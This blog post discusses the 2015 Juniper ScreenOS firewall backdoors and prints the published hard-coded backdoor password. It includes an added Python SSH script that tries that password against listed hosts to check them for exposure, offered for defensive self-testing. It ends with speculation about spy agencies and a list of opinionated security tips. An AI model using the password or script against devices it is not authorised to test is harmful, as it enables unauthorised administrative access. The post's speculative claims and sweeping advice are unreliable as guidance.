The worst thing happened

What is the worst thing you can imagine happening with regard to network security?

How about a network device that is supposed to protect your network but has a back-door allowing access by anyone from anywhere? Yes, that’s scary, right?

Exactly this has happened to Juniper users, and we are all affected.

For your information, Juniper is, after Cisco, the second largest vendor of routers, switches, firewalls and other network products. Their products are used everywhere from small businesses and large companies to network providers and government networks.

Recently Juniper announced that it had discovered unauthorized code in ScreenOS, the software running its NetScreen firewalls. This code contains two back-doors: one (CVE-2015-7755) gives full administrative access to the device, the other (CVE-2015-7756) allows anyone who can capture VPN traffic to decrypt it. Further investigation by security researchers showed that every firewall running the affected ScreenOS versions shipped from 2013 until recently (ScreenOS 6.3.0r17 through 6.3.0r20 for the administrative back-door) can be accessed by anyone from anywhere via SSH or Telnet using any username together with the hard-coded password "<<< %s(un='%s') = %u". Juniper has released fixed ScreenOS versions; installing the update closes both back-doors.
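The check a practitioner wants at this point is to test their own NetScreen devices for the back-door password before somebody else does. The script below is an added example; it is not code from the original post, from Juniper or from NetworkToolbox. It assumes the third-party paramiko SSH library for real connections, uses the ScreenOS default admin name "netscreen" as the username (any username works with the back-door, so the choice is arbitrary), and uses a made-up control password to detect devices that accept anything. Only the back-door password string itself comes from Juniper's advisory and the text above.

```python
"""Test whether a ScreenOS device accepts the CVE-2015-7755 backdoor
password over SSH.

Added example, not code from the original post, from Juniper or from
NetworkToolbox.  The password string is the published one; the helper
names, the "netscreen" username and the control password are assumptions
made for illustration.  Real connections need the third-party paramiko
library; the classification logic is kept separate from the network code
so it can be exercised without one.
"""
import sys

# Hard-coded password the backdoored ScreenOS releases accept for any username.
BACKDOOR_PASSWORD = "<<< %s(un='%s') = %u"

# The backdoor works with any username; "netscreen" is simply the ScreenOS
# default admin account and is used here as an assumption.
DEFAULT_USERNAME = "netscreen"

# Deliberately wrong password used as a control probe (assumption: no real
# device is configured with it).
CONTROL_PASSWORD = "not-the-backdoor-password-8c1e4b"


def ssh_password_accepted(host, username, password, port=22, timeout=5):
    """Attempt one SSH password login.

    Returns True if the device accepted the password, False if it rejected
    it.  Any other failure (unreachable host, protocol error) is raised as
    ConnectionError so the caller can tell "not vulnerable" apart from
    "could not test".  paramiko is imported lazily so the rest of the
    module works without it.
    """
    import paramiko

    client = paramiko.SSHClient()
    # Host key is not verified: this is a one-shot probe of a device we
    # own, and nothing sensitive is sent over the session.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, port=port, username=username, password=password,
                       timeout=timeout, allow_agent=False, look_for_keys=False)
        return True
    except paramiko.AuthenticationException:
        return False
    except paramiko.SSHException as exc:
        raise ConnectionError("%s: %s" % (host, exc)) from exc
    finally:
        client.close()


def assess_host(host, try_login=ssh_password_accepted, username=DEFAULT_USERNAME):
    """Classify one host as 'vulnerable', 'not_vulnerable', 'inconclusive'
    or 'unreachable'.

    try_login(host, username, password) -> bool is injectable so the logic
    can be tested offline.  A control login with a wrong password is tried
    first: a device (or honeypot) that accepts *that* tells us nothing about
    the backdoor, so it is reported as inconclusive instead of vulnerable.
    """
    try:
        if try_login(host, username, CONTROL_PASSWORD):
            return "inconclusive"
        if try_login(host, username, BACKDOOR_PASSWORD):
            return "vulnerable"
        return "not_vulnerable"
    except OSError:  # ConnectionError, socket.timeout, refused, DNS failure
        return "unreachable"


def assess_hosts(hosts, try_login=ssh_password_accepted):
    """Return {host: verdict} for every host; one failure never aborts the run."""
    return {host: assess_host(host, try_login) for host in hosts}


if __name__ == "__main__":
    # Usage: python screenos_backdoor_check.py fw1.example.net 192.0.2.10 ...
    # Run this only against devices you are authorised to test.
    for host, verdict in assess_hosts(sys.argv[1:]).items():
        print("%-30s %s" % (host, verdict))
```

Two caveats when using it: every probe produces login attempts in the device's own log (one failed control attempt plus the back-door attempt), so expect to see them in your SIEM, and the script only tests the SSH path; the same password also works over Telnet, and the separate VPN decryption back-door cannot be detected by a login test at all, which is why the version check and the update remain the authoritative answer.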

So far, it is unknown how this back-door got into their code.

Currently, Morpheus and Shodan find more than 30,000 of these devices exposed on the Internet.

Maybe you personally don’t use Juniper hardware, but be assured that your provider, bank, online store or the company you work for quite likely does.

It was good that Juniper proactively informed the public about their findings, so that security researchers were able to start their own investigations. However, it took two years to find the back-doors. My personal assumption is that organizations like the NSA, GCHQ or Asian or Russian agencies are responsible for this, and moreover, I assume that similar back-doors exist in other network devices such as those from Cisco and other “big players”.

I now even see the other back-doors I mentioned in my blog (here and here) from a different perspective. It is not unlikely that these back-doors were not the result of brain-dead developers but have the same source.

Regardless of whether my assumptions are correct, many networks are currently at high risk, even more so because it is no longer only the NSA, GCHQ etc. who are able to access our data; now even inexperienced criminals can.

Due to the impact of this issue, there is not much one can do other than follow these rules, which make sense regardless of this particular incident:

  • Think twice before giving out personal information such as your name, address, email address and payment details. Better to enter it for every single transaction than to let an online shop conveniently store it
  • Use strong passwords and change your passwords regularly
  • Never use one and the same password for different services
  • Never use one service to log into another (e.g. don’t use “Login with Facebook” for Netflix)
  • Where possible, create fake accounts and fake identities and use them instead of your real ones
  • Leave Yahoo. If you still have a Yahoo account, close it. It is not unlikely that Yahoo will be sold soon, so your information might end up somewhere else
  • Better not use a public WiFi network without a VPN. Use your cell network (3G/4G/LTE) instead when security matters
  • Use Firefox instead of Internet Explorer
  • Use Ove’s Self-Destructing Cookies plugin or something similar in your browser
  • Set up your mail clients to use encrypted passwords and SSL/TLS
  • Better not use web-mail clients (except for your fake accounts)
  • Never ever use Android devices
  • Never ever use Windows XP anymore
  • Always install updates (for Software and Hardware)
  • Always change default passwords
  • And of course, consider NetworkToolbox to check for security issues

Of course, there is much more we can do, but most of the above is either easy to do or simply mandatory and without alternative.

Regardless, I wish you and your families a Merry Christmas and all the best for a secure 2016!

Marcus